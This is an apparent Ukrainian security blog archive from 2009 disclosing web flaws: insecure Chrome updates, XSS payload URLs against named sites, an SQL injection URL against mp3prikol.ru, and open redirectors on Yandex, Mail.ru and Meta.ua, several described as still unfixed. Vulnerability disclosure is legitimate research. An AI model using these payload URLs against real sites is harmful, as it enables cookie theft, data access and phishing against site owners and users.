Архів для категорії 'Уразливості'

Добірка уразливостей

16:21 10.02.2009

В даній добірці уразливості в веб додатках:

Ненадійне оновлення в Google Chrome

23:53 09.02.2009

Одразу після виходу Google Chrome, як почав активно його досліджувати, 09.09.2008, я запідозрив, що даний браузер має уразливість пов’язану з ненадійним оновленням. І ось лише сьогодні я знайшов час, щоб це перевірити, і підтвердив наявність даної уразливості в браузері.

Представляю нову дірку в Google Chrome, яка полягає в тому, що браузер має ненадійне оновлення. Chrome оновлюється через незашифроване з’єднання - як перевірка наявності оновлень, так і безпосередньо їх викачка відбувається через http, а не через https (тобто без використання SSL). Що може бути використано зловмисниками для проведення MITM атаки, з метою виконання коду, або підміни браузера на шкідливий додаток (в тому числі на версію Chrome з вбудованим трояном).

Цю ситуацію посилює те, що апдейт в Хромі автоматичний, який не можна відключити в браузері (тільки в налаштуваннях ОС). І користувач може й не запідозрити, коли на нього проведуть MITM атаку і замінять браузер на версію з трояном. Тому варто зробити, щоб ця функція мала налаштування (і виконувалася через SSL).

До речі, раніше я писав про те, що доповнення до Firefox, Yahoo і Google можуть використовуватися для атаки на користувачів (зокрема в даній новині йшлося про Google Toolbar і Google Browser Sync), а також про проблеми з оновленнями в багатьох розширеннях Mozilla та Firefox. Про це повідомлялося ще в 2007 році й того ж року Мозіла виправила дану уразливість в своєму браузері (тоді ще в Firefox 2). А Firefox 3 з самого початку виконує оновлення тільки через SSL.

Уразлива версія Google Chrome 1.0.154.48 та попередні версії.

Уразливості на wpthemesfree.com

20:14 09.02.2009

01.08.2008

У листопаді, 21.11.2007, я знайшов Cross-Site Scripting уразливості на проекті http://wpthemesfree.com. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

09.02.2009

XSS:

XSS (IE):

При кліку на лінці “Add to Favorites”. Це strictly social XSS.

http://wpthemesfree.com/index.php?order=');alert(document.cookie);//
http://wpthemesfree.com/index.php?page=');alert(document.cookie);//
http://wpthemesfree.com/index.php?category=');alert(document.cookie);//
http://wpthemesfree.com/index.php?property=');alert(document.cookie);//
http://wpthemesfree.com/index.php?');alert(document.cookie);//

Всі сторінки на сайті, що мають лінку “Add to Favorites”, вразливі до даної XSS.

Якщо strictly social XSS вже виправлені, то всі reflected XSS уразливості досі не виправлені.

Уразливості на fbi.gov, citibank.com, cisco.com, ukr.net та yandex.ru

23:58 07.02.2009

Нещодавно, 04.02.2009, я виявив Same Site Scripting уразливості на серверах fbi.gov, citibank.com, cisco.com, ukr.net та yandex.ru.

Сайти вразливі до Same Site Scripting:

http://localhost.fbi.gov

http://localhost.citibank.com

http://localhost.cisco.com

http://localhost.ukr.net

http://localhost.yandex.ru

Для перевірки вразливості даних сайтів, ви повинні мати локальний веб сервер (на http://localhost).

XSS:

При наявності на вашому комп’ютері CUPS (Unix, Linux, Mac OS), ви можете перевірити наступну XSS атаку.

http://localhost.fbi.gov:631/jobs/?job_id=&job_printer_name=Click%20Me&job_printer_uri=javascript:alert(document.cookie)
http://localhost.citibank.com:631/jobs/?job_id=&job_printer_name=Click%20Me&job_printer_uri=javascript:alert(document.cookie)
http://localhost.cisco.com:631/jobs/?job_id=&job_printer_name=Click%20Me&job_printer_uri=javascript:alert(document.cookie)
http://localhost.ukr.net:631/jobs/?job_id=&job_printer_name=Click%20Me&job_printer_uri=javascript:alert(document.cookie)
http://localhost.yandex.ru:631/jobs/?job_id=&job_printer_name=Click%20Me&job_printer_uri=javascript:alert(document.cookie)

Добірка уразливостей

16:09 07.02.2009

В даній добірці уразливості в веб додатках:

  • onelook onebyone CMS - Session fixation Issue (деталі)
  • phpContact Multiple Remote File Inclusion Vulnerabilities (деталі)
  • Cross-site scripting (XSS) vulnerability in CmailServer WebMail (деталі)
  • Cross-site scripting (XSS) vulnerability in CmailServer WebMail (деталі)
  • Cross-site scripting (XSS) vulnerability in Arizona Dream Livre d’or (livor) 2.5 (деталі)
  • Updated heimdal packages fix potential vulnerability (деталі)
  • Novell Groupwise client remote stack overflow silently patched (деталі)
  • The Everything Development System - SQL Injection (деталі)
  • Cross-Site Scripting vulnerability in Webmin 1.390 (деталі)
  • Arbitrary file overwrite in Documentum Administrator / Documentum Webtop (деталі)

Уразливості на mp3prikol.ru

19:32 06.02.2009

28.07.2008

У листопаді, 16.11.2007, я знайшов SQL Injection та Cross-Site Scripting уразливості на проекті http://mp3prikol.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

06.02.2009

SQL Injection:

http://mp3prikol.ru/?action=view_track&track_id=-1%20union%20select%201,1,version(),1,1,1,1

XSS (через SQL Injection):

Дані уразливості досі не виправлені.

Уразливість на gazeta.narod.ru

23:59 05.02.2009

У березні, 20.03.2008, я знайшов Cross-Site Scripting уразливість на Народі Яндекса, зокрема на сайті http://gazeta.narod.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на gazeta.narod.ru.

XSS:

Добірка уразливостей

16:11 05.02.2009

В даній добірці уразливості в веб додатках:

  • Multiple SQL Injection Flaws in Oracle CTX_DOC package (деталі)
  • Oracle TNS Listener DoS and/or remote memory inspection (деталі)
  • Oracle Updates for Multiple Vulnerabilities (деталі)
  • VHD Web Pack 2.0 Local File Include (деталі)
  • xoops 2.0.18 Local File Include (деталі)
  • witshare 0.9 Remote File Include Vulnerabilitiy (деталі)
  • webblizzard CMS - Cross Site Scripting and Session fixation Issues (деталі)
  • livor 2.5 Cross-Site Scripting Vulnerability (деталі)
  • onelook courts online - Session fixation Issue (деталі)
  • onelook oboShop - Session fixation Issue (деталі)

Редиректори на популярних сайтах №5

23:54 04.02.2009

Продовжую розповідати вам про редиректори на популярних сайтах. Редиректори - це окремий різновид уразливостей в веб додатках, котрий відноситься до класу Abuse of Functionality. Дані уразливості можуть використовуватися зловмисниками для переадресації на небезпечні та фішинг сайти.

До наведених в попередньому записі, приведу ще декілька прикладів редиректорів на популярних веб сайтах.

Редиректори на популярних сайтах:

Новий на Yandex.ru:

http://mail.yandex.ru/r?url=http://websecurity.com.ua

Mail.ru:

http://rb.mail.ru/clbkjb/websecurity.com.ua

Meta.ua (до раніше згаданих редиректорів на Меті):

http://img.meta.ua/mclick.asp?go=http://websecurity.com.ua

Уразливості на freelancer.com.ua

19:29 04.02.2009

31.07.2008

У листопаді, 20.11.2007, я знайшов Cross-Site Scripting (в тому числі persistent) уразливості на проекті http://freelancer.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

04.02.2009

XSS:

http://search.freelancer.com.ua

XSS (persistent):

Код розміщується на сторінках сайта search.freelancer.com.ua в лівій колонці.

XSS:

http://freelancer.com.ua

Дані уразливості досі не виправлені.